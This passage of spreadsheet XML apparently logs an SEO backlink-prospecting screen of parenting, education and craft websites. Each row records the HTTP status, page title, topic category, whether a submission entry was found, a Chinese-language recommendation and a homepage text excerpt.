      <x:c r="S61" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T61" s="21" t="str">
        <x:v>不适合当前免费全球工具的首批外链。 | 请求: https://careforkids.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="62">
      <x:c r="A62" s="18" t="str">
        <x:v>61</x:v>
      </x:c>
      <x:c r="B62" s="19" t="str">
        <x:v>teachertypes.com</x:v>
      </x:c>
      <x:c r="C62" s="19" t="str">
        <x:v>https://teachertypes.com</x:v>
      </x:c>
      <x:c r="D62" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E62" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F62" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G62" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H62" s="19" t="str">
        <x:v>https://teachertypes.com/</x:v>
      </x:c>
      <x:c r="I62" s="19" t="str">
        <x:v>Parked Domain | easyDNS</x:v>
      </x:c>
      <x:c r="J62" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K62" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L62" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M62" s="19" t="str">
        <x:v>https://teachertypes.com/</x:v>
      </x:c>
      <x:c r="N62" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O62" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P62" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q62" s="21" t="str">
        <x:v>This domain is parked with easyDNS. Parked Domain | easyDNS</x:v>
      </x:c>
      <x:c r="R62" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S62" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T62" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://teachertypes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="63">
      <x:c r="A63" s="18" t="str">
        <x:v>62</x:v>
      </x:c>
      <x:c r="B63" s="19" t="str">
        <x:v>defeat-dyslexia.com</x:v>
      </x:c>
      <x:c r="C63" s="19" t="str">
        <x:v>https://defeat-dyslexia.com</x:v>
      </x:c>
      <x:c r="D63" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E63" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F63" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G63" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H63" s="19" t="str">
        <x:v>https://hollyswinton.co.uk/</x:v>
      </x:c>
      <x:c r="I63" s="19" t="str">
        <x:v>Holly Swinton | dyslexia assessor, author, speaker and tutor</x:v>
      </x:c>
      <x:c r="J63" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K63" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L63" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M63" s="19" t="str">
        <x:v>https://hollyswinton.co.uk/</x:v>
      </x:c>
      <x:c r="N63" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O63" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P63" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q63" s="21" t="str">
        <x:v>Based in Oxfordshire, Holly Swinton an officially-accredited Dyslexia Assessor. She is a popular public speaker, and author of Defeat Dyslexia! Holly Swinton | dyslexia assessor, author, speaker and tutor About Holly Mailing List Contact Menu About Holly Tutoring Dyslexia Assessment Defeat Dyslexia! Book Speaking and Workshops Mailing List Contact Tutoring Dyslexia Assessment Defeat Dyslexia! Book Speaking and Workshops Meet Holly Holly Swinton is a dyslexia assessor, author, speaker and trainer. She understands, both from first-hand experience and academic study, the strengths and weaknesses of dyslexia. Her life is dedicated to helping dyslexic individuals to unlock their enormous potential. Learn more about Holly Dyslexia Assessment Holly Swinton is a Specialist Dyslexia Assessor , with over ten years’ experience providing dyslex</x:v>
      </x:c>
      <x:c r="R63" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S63" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T63" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://defeat-dyslexia.com</x:v>
      </x:c>
    </x:row>
    <x:row r="64">
      <x:c r="A64" s="18" t="str">
        <x:v>63</x:v>
      </x:c>
      <x:c r="B64" s="19" t="str">
        <x:v>diypartymom.com</x:v>
      </x:c>
      <x:c r="C64" s="19" t="str">
        <x:v>https://diypartymom.com</x:v>
      </x:c>
      <x:c r="D64" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E64" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F64" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G64" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H64" s="19" t="str">
        <x:v>https://www.diypartymom.com/</x:v>
      </x:c>
      <x:c r="I64" s="19" t="str">
        <x:v>DIY Party Mom</x:v>
      </x:c>
      <x:c r="J64" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K64" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L64" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M64" s="19" t="str">
        <x:v>https://www.diypartymom.com/</x:v>
      </x:c>
      <x:c r="N64" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O64" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P64" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q64" s="21" t="str">
        <x:v>DIY Party Mom Pages Parties Printables Holidays Plastic Canvas Party Shop Resources Amazon Journals Linky Parties About Me This post may contain affiliate links. When you click on a link, you are supporting DIY Party Mom, my family, and our blog fun. Thank you for your love and support! How to Host a Frugal Backyard Classic Movie Night Your Family Will Love There is something magical about watching a movie under the stars. The twinkle lights, cozy blankets, buttery popcorn, and everyone gathered together make it feel like a special occasion without spending a fortune. Read more » at June 23, 2026 No comments: Email This BlogThis! Share to X Share to Facebook Share to Pinterest The 45th Annua</x:v>
      </x:c>
      <x:c r="R64" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S64" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T64" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://diypartymom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="65">
      <x:c r="A65" s="18" t="str">
        <x:v>64</x:v>
      </x:c>
      <x:c r="B65" s="19" t="str">
        <x:v>domain.glass</x:v>
      </x:c>
      <x:c r="C65" s="19" t="str">
        <x:v>https://domain.glass</x:v>
      </x:c>
      <x:c r="D65" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E65" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="F65" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G65" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H65" s="19" t="str">
        <x:v>https://domain.glass/</x:v>
      </x:c>
      <x:c r="I65" s="19" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="J65" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K65" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L65" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M65" s="19" t="str">
        <x:v>https://domain.glass/</x:v>
      </x:c>
      <x:c r="N65" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O65" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P65" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q65" s="21" t="str">
        <x:v>Just a moment...</x:v>
      </x:c>
      <x:c r="R65" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S65" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T65" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://domain.glass</x:v>
      </x:c>
    </x:row>
    <x:row r="66">
      <x:c r="A66" s="18" t="str">
        <x:v>65</x:v>
      </x:c>
      <x:c r="B66" s="19" t="str">
        <x:v>thecottagemarket.com</x:v>
      </x:c>
      <x:c r="C66" s="19" t="str">
        <x:v>https://thecottagemarket.com</x:v>
      </x:c>
      <x:c r="D66" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E66" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F66" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G66" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H66" s="19" t="str">
        <x:v>https://thecottagemarket.com/</x:v>
      </x:c>
      <x:c r="I66" s="19" t="str">
        <x:v>The Cottage Market - An Eclectic Blog</x:v>
      </x:c>
      <x:c r="J66" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K66" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L66" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M66" s="19" t="str">
        <x:v>https://thecottagemarket.com/</x:v>
      </x:c>
      <x:c r="N66" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O66" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P66" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q66" s="21" t="str">
        <x:v>An Eclectic Blog The Cottage Market - An Eclectic Blog Life Hacks Farmhouse IKEA Hacks Thrift Store Makeovers Pottery Barn Privacy Policy The Cottage Market An Eclectic Blog Home About Round-Ups Recipes Pets 4000+ Free Printables Wall Art Greeting Cards Free Printable Wall Art Galleries Banners Calendars DIY and Crafts Shop Latest from the Blog ALDI Finds for September 2, 2026: Fall Kitchen Favorites, Cozy Decor and Game Day Snacks Free Printable 2027 Chinoiserie Calendar in Blue and White 15 Thrift Store Finds Turned Into Charming Displays 22 Dollar Store Pumpkin Crafts Cozy Cottage Decorating Ideas, Farmhouse DIYs and the Last Tastes of Summer Free Printable Modern Home Café Wall Art Gallery 20 Creative DI</x:v>
      </x:c>
      <x:c r="R66" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S66" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T66" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://thecottagemarket.com</x:v>
      </x:c>
    </x:row>
    <x:row r="67">
      <x:c r="A67" s="18" t="str">
        <x:v>66</x:v>
      </x:c>
      <x:c r="B67" s="19" t="str">
        <x:v>inspirekidsmontessori.com</x:v>
      </x:c>
      <x:c r="C67" s="19" t="str">
        <x:v>https://inspirekidsmontessori.com</x:v>
      </x:c>
      <x:c r="D67" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E67" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F67" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G67" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H67" s="19" t="str">
        <x:v>https://inspirekidsmontessori.com/</x:v>
      </x:c>
      <x:c r="I67" s="19" t="str">
        <x:v>Inspire Kids Montesorri - Montessori School Ahwatukee</x:v>
      </x:c>
      <x:c r="J67" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K67" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L67" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M67" s="19" t="str">
        <x:v>https://inspirekidsmontessori.com/</x:v>
      </x:c>
      <x:c r="N67" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O67" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P67" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q67" s="21" t="str">
        <x:v>Discover Inspire Kids Montessori, a premier school in Ahwatukee and South Chandler. Enhance your child academic and social skills. Schedule a visit today. Inspire Kids Montesorri - Montessori School Ahwatukee Skip to content Donate Book a Tour Book a Tour Home About Us Founder Our Mission Why Inspire Kids Montessori Prepared Environment Safety and Security Leave A Review Programs Infants &amp; Young Toddlers (3+ months) Toddlers (16+ months) Pre-K (3+ years) Kindergarten (5+ years) Admission Blog Testimonials Scholarships Request Info Welcome to Inspire kids montessori Premier Infant, Pre-Primary, Primary and Kindergarten in Ahwatukee and South Chandler. Schedule a tour https://inspirekidsmontessori.com/wp-content/uploads/2024/09/Ms-Diana.mp4 THE PREMIER EARLY LEARNING MONTESSORI SCHOOL IN AHWATUKEE AND SOUTH CHANDLER Inspire Kids Montessori is th</x:v>
      </x:c>
      <x:c r="R67" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S67" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T67" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://inspirekidsmontessori.com</x:v>
      </x:c>
    </x:row>
    <x:row r="68">
      <x:c r="A68" s="18" t="str">
        <x:v>67</x:v>
      </x:c>
      <x:c r="B68" s="19" t="str">
        <x:v>imamother.com</x:v>
      </x:c>
      <x:c r="C68" s="19" t="str">
        <x:v>https://imamother.com</x:v>
      </x:c>
      <x:c r="D68" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E68" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F68" s="20" t="str">
        <x:v>204</x:v>
      </x:c>
      <x:c r="G68" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H68" s="19" t="str">
        <x:v>https://www.imamother.com/forum/portal.php</x:v>
      </x:c>
      <x:c r="I68" s="19" t="str"/>
      <x:c r="J68" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K68" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L68" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M68" s="19" t="str">
        <x:v>https://www.imamother.com/forum/portal.php</x:v>
      </x:c>
      <x:c r="N68" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O68" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P68" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q68" s="21" t="str"/>
      <x:c r="R68" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S68" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T68" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://imamother.com</x:v>
      </x:c>
    </x:row>
    <x:row r="69">
      <x:c r="A69" s="18" t="str">
        <x:v>68</x:v>
      </x:c>
      <x:c r="B69" s="19" t="str">
        <x:v>craftsyhacks.com</x:v>
      </x:c>
      <x:c r="C69" s="19" t="str">
        <x:v>https://craftsyhacks.com</x:v>
      </x:c>
      <x:c r="D69" s="20" t="str">
        <x:v>3</x:v>
      </x:c>
      <x:c r="E69" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F69" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G69" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H69" s="19" t="str">
        <x:v>https://craftsyhacks.com/</x:v>
      </x:c>
      <x:c r="I69" s="19" t="str">
        <x:v>Craftsy Hacks - DIY, Decorating and Organizing</x:v>
      </x:c>
      <x:c r="J69" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K69" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L69" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M69" s="19" t="str">
        <x:v>https://craftsyhacks.com/</x:v>
      </x:c>
      <x:c r="N69" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O69" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P69" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q69" s="21" t="str">
        <x:v>DIY crafts, organizing tips, and decor ideas for anyone and everyone. Transform your home into a creative, fulfilling space. Craftsy Hacks - DIY, Decorating and Organizing Skip to content DIY DRAWING NAILS GIFTS ORGANIZATION PLANNING HOME HOME DECOR CLEANING WEDDING ACTIVITIES GAMES PARTY IDEAS LIFE HACKS About Search Organizing, DIY Crafts and Home Ideas All In One Place Organization Wedding DIY Gifts Hello there! Hey! My name is Karolina, and I&amp;rsquo;m a fan of all things practical! I love being creative with DIYs, improving my home, decluttering, cleaning, planning, and finding ways to keep the little ones busy :). I believe that home is an important place for the mind and the soul. A harmonious home space can help you grow, achieve your dreams, and unlock new levels of creativity you didn&amp;rsquo;t know you had.</x:v>
      </x:c>
      <x:c r="R69" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S69" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T69" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://craftsyhacks.com</x:v>
      </x:c>
    </x:row>
    <x:row r="70">
      <x:c r="A70" s="18" t="str">
        <x:v>69</x:v>
      </x:c>
      <x:c r="B70" s="19" t="str">
        <x:v>myquickfit.net</x:v>
      </x:c>
      <x:c r="C70" s="19" t="str">
        <x:v>https://myquickfit.net</x:v>
      </x:c>
      <x:c r="D70" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E70" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F70" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G70" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H70" s="19" t="str">
        <x:v>https://myquickfit.net/</x:v>
      </x:c>
      <x:c r="I70" s="19" t="str"/>
      <x:c r="J70" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K70" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L70" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M70" s="19" t="str">
        <x:v>https://myquickfit.net/</x:v>
      </x:c>
      <x:c r="N70" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O70" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P70" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q70" s="21" t="str"/>
      <x:c r="R70" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S70" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T70" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://myquickfit.net</x:v>
      </x:c>
    </x:row>
    <x:row r="71">
      <x:c r="A71" s="18" t="str">
        <x:v>70</x:v>
      </x:c>
      <x:c r="B71" s="19" t="str">
        <x:v>motheroohq.com</x:v>
      </x:c>
      <x:c r="C71" s="19" t="str">
        <x:v>https://motheroohq.com</x:v>
      </x:c>
      <x:c r="D71" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E71" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F71" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G71" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H71" s="19" t="str">
        <x:v>https://motheroohq.com/</x:v>
      </x:c>
      <x:c r="I71" s="19" t="str">
        <x:v>MotherooHQ - Parenting with intention.</x:v>
      </x:c>
      <x:c r="J71" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K71" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L71" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M71" s="19" t="str">
        <x:v>https://motheroohq.com/</x:v>
      </x:c>
      <x:c r="N71" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O71" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P71" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q71" s="21" t="str">
        <x:v>Parenting with intention. MotherooHQ - Parenting with intention. Resources Freebies Become an Intentional Parent Recommended Recipes Podcast Topics Baby Led Weaning Development Nursing Parenting Montessori First Time Mothers Early Development Technology Activities Solids About About Shaine My Parenting Philosophy Links Contact Collaborate with me Disclaimer I'm Shaine, a first-time mum, stay-at-home mum and former educator. New blog every Monday Go to my Links menu Shaine Ramirez Resources Freebies Become an Intentional Parent Recommended Recipes Podcast Topics Baby Led Weaning Development Nursing Parenting Montessori First Time Mothers Early Development Technology Activities Solids About About Shaine My Parenting Ph</x:v>
      </x:c>
      <x:c r="R71" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S71" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T71" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://motheroohq.com</x:v>
      </x:c>
    </x:row>
    <x:row r="72">
      <x:c r="A72" s="18" t="str">
        <x:v>71</x:v>
      </x:c>
      <x:c r="B72" s="19" t="str">
        <x:v>kidactivitieswithalexa.com</x:v>
      </x:c>
      <x:c r="C72" s="19" t="str">
        <x:v>https://kidactivitieswithalexa.com</x:v>
      </x:c>
      <x:c r="D72" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E72" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F72" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G72" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H72" s="19" t="str">
        <x:v>https://kidactivitieswithalexa.com/</x:v>
      </x:c>
      <x:c r="I72" s="19" t="str">
        <x:v>- Play-based activities and educational resources for toddlers at home</x:v>
      </x:c>
      <x:c r="J72" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K72" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L72" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M72" s="19" t="str">
        <x:v>https://kidactivitieswithalexa.com/</x:v>
      </x:c>
      <x:c r="N72" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O72" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P72" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q72" s="21" t="str">
        <x:v>Play-Based Learning for Ages 1–4 Not sure what to teach your toddler next? Start here. Simple, age-appropriate activities that help your child learn through play — so you can stop guessing, stop scrolling, and start doing the things that actually support their development. Start the Free Curriculum → - Kid Activities with Alexa - Play-based activities and educational resources for toddlers at home Skip to content 0 Menu Start Here: Free Toddler Curriculum Start Age 1 Start Age 2 Start Age 3 Activities Toddler Curriculum My First School – Level 1 My First School – Age 2 My First School – Age 3 My First School · Level 4 · Pre-Kindergarten Little Learn Club Elementary Curriculums Binders Learning Binder – Age 1 Learning Binder – Age 2 Learning Binder – Level 3 Shop About Amazon Picks Contact Login 0 0 Menu Start Here: Free Toddler Curriculum Start Age 1 Start Age 2 Start Age 3 Activities Toddler Curriculum My First School – Level 1 My First School – Age 2 My First School – Age 3 My First School · Level 4 · Pre-Kinderg</x:v>
      </x:c>
      <x:c r="R72" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S72" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T72" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://kidactivitieswithalexa.com</x:v>
      </x:c>
    </x:row>
    <x:row r="73">
      <x:c r="A73" s="18" t="str">
        <x:v>72</x:v>
      </x:c>
      <x:c r="B73" s="19" t="str">
        <x:v>alisonlouisebellbooks.com</x:v>
      </x:c>
      <x:c r="C73" s="19" t="str">
        <x:v>https://alisonlouisebellbooks.com</x:v>
      </x:c>
      <x:c r="D73" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E73" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F73" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G73" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H73" s="19" t="str">
        <x:v>https://www.alisonlouisebellbooks.com/</x:v>
      </x:c>
      <x:c r="I73" s="19" t="str">
        <x:v>Alison Louise Bell Books - Home</x:v>
      </x:c>
      <x:c r="J73" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K73" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L73" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M73" s="19" t="str">
        <x:v>https://www.alisonlouisebellbooks.com/</x:v>
      </x:c>
      <x:c r="N73" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O73" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P73" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q73" s="21" t="str">
        <x:v>Alison Louise Bell Books Alison Louise Bell Books - Home Alison Louise Bell Books Home My Books and Store About Contact Alison Alison Louise Bell Books Blog Welcome To Alison Louise Bell Books ​ ​ ​Hi there. It's so lovely of you to visit, you're very welcome here, exactly as you are. Let's go through the magical doorway, sit in a cosy chair with a darling soft blanket, next to a scented crackling fire, with a delicious warm drink, , , chat a while, read some books, nourish the magnificent souls that we are, and be just gloriously be. ​Social Feed Coming Soon &amp;ldquo; &amp;ldquo;I love the way the butterfly can change colours and have different coloured wings. The pictures are golden. Next time, can the magical door go t</x:v>
      </x:c>
      <x:c r="R73" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S73" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T73" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://alisonlouisebellbooks.com</x:v>
      </x:c>
    </x:row>
    <x:row r="74">
      <x:c r="A74" s="18" t="str">
        <x:v>73</x:v>
      </x:c>
      <x:c r="B74" s="19" t="str">
        <x:v>haleywynndesigns.com</x:v>
      </x:c>
      <x:c r="C74" s="19" t="str">
        <x:v>https://haleywynndesigns.com</x:v>
      </x:c>
      <x:c r="D74" s="20" t="str">
        <x:v>2</x:v>
      </x:c>
      <x:c r="E74" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F74" s="20" t="str">
        <x:v>404</x:v>
      </x:c>
      <x:c r="G74" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H74" s="19" t="str">
        <x:v>https://haleywynndesigns.com/</x:v>
      </x:c>
      <x:c r="I74" s="19" t="str">
        <x:v>Squarespace - Website Expired</x:v>
      </x:c>
      <x:c r="J74" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K74" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L74" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M74" s="19" t="str">
        <x:v>https://haleywynndesigns.com/</x:v>
      </x:c>
      <x:c r="N74" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O74" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P74" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q74" s="21" t="str">
        <x:v>Squarespace - Website Expired</x:v>
      </x:c>
      <x:c r="R74" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
